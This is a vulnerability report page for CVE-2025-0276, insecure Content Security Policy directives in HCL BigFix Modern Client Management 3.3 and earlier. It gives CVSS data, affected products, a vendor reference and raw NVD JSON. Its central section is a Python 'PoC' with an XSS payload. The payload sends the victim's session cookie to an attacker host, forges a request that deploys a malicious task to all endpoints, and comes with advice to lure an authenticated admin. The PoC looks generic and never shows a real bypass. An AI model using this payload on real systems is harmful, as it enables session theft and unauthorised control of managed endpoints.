Security Vulnerability Report
CVE-2025-0276 CVSS 6.5 MEDIUM

CVE-2025-0276

Published: 2025-10-16 09:15:32
Last Modified: 2025-10-21 13:03:12

Description

HCL BigFix Modern Client Management (MCM) 3.3 and earlier are vulnerable to certain insecure directives within the Content Security Policy (CSP). An attacker could trick users into performing actions by not properly restricting the sources of scripts and other content.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:hcltech:bigfix_mobile:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hcltech:bigfix_modern_client_management:*:*:*:*:*:*:*:* - VULNERABLE
HCL BigFix Modern Client Management (MCM) <= 3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-0276 PoC - HCL BigFix MCM CSP Bypass
# This PoC demonstrates exploitation of insecure CSP directives
# in HCL BigFix Modern Client Management (MCM) <= 3.3
import requests
from urllib.parse import urljoin

TARGET_URL = "https://target-bigfix-mcm-server:443"
MALICIOUS_PAYLOAD_HOST = "https://attacker-controlled-server.com"


def check_csp_headers(target_url):
    """Check if the target has insecure CSP directives"""
    response = requests.get(target_url, verify=False)
    csp_header = response.headers.get("Content-Security-Policy", "")
    insecure_directives = []

    # Check for unsafe-inline directive
    if "unsafe-inline" in csp_header:
        insecure_directives.append("'unsafe-inline' allows inline script execution")

    # Check for unsafe-eval directive
    if "unsafe-eval" in csp_header:
        insecure_directives.append("'unsafe-eval' allows eval() execution")

    # Check for wildcard sources
    if "*" in csp_header or "data:" in csp_header:
        insecure_directives.append("Wildcard or data: URI in source list")

    # Check for missing frame-ancestors
    if "frame-ancestors" not in csp_header:
        insecure_directives.append("Missing frame-ancestors directive (clickjacking risk)")

    return insecure_directives


def craft_xss_payload():
    """Craft an XSS payload that bypasses the insecure CSP"""
    # Since CSP allows 'unsafe-inline', inline scripts can be executed
    payload = """
<script>
// Exploit: Steal session cookie or perform unauthorized actions
var sessionToken = document.cookie;
var img = new Image();
img.src = 'https://attacker-controlled-server.com/steal?token=' + encodeURIComponent(sessionToken);

// Perform CSRF-like action: create unauthorized task
fetch('/api/tasks', {
    method: 'POST',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify({
        name: 'Malicious Task',
        action: 'deploy',
        target: 'all-endpoints'
    })
});
</script>
"""
    return payload


def exploit(target_url):
    """Main exploit function"""
    print(f"[*] Target: {target_url}")
    print("[*] Checking CSP configuration...")
    issues = check_csp_headers(target_url)
    if issues:
        print("[!] Insecure CSP directives found:")
        for issue in issues:
            print(f" - {issue}")
        print("\n[*] Crafting XSS payload to bypass CSP...")
        payload = craft_xss_payload()
        print(f"[+] Payload ready: {payload[:100]}...")
        print("[+] Host the payload on attacker-controlled page")
        print("[+] Trick authenticated admin to visit the malicious page")
    else:
        print("[-] CSP appears to be properly configured")


if __name__ == "__main__":
    exploit(TARGET_URL)
```

References

https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124513 (Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-0276", "sourceIdentifier": "[email protected]", "published": "2025-10-16T09:15:31.690", "lastModified": "2025-10-21T13:03:12.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL BigFix Modern Client Management (MCM) 3.3 and earlier are vulnerable to certain insecure directives within the Content Security Policy (CSP). An attacker could trick users into performing actions by not properly restricting the sources of scripts and other content."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-80"}, {"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_mobile:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.3", "matchCriteriaId": "97CEC651-375F-4FE8-B947-0A3D89FF0267"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_modern_client_management:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.4", "matchCriteriaId": "251EA75C-E4D9-4A13-B13D-02DFF9E6161D"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124513", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```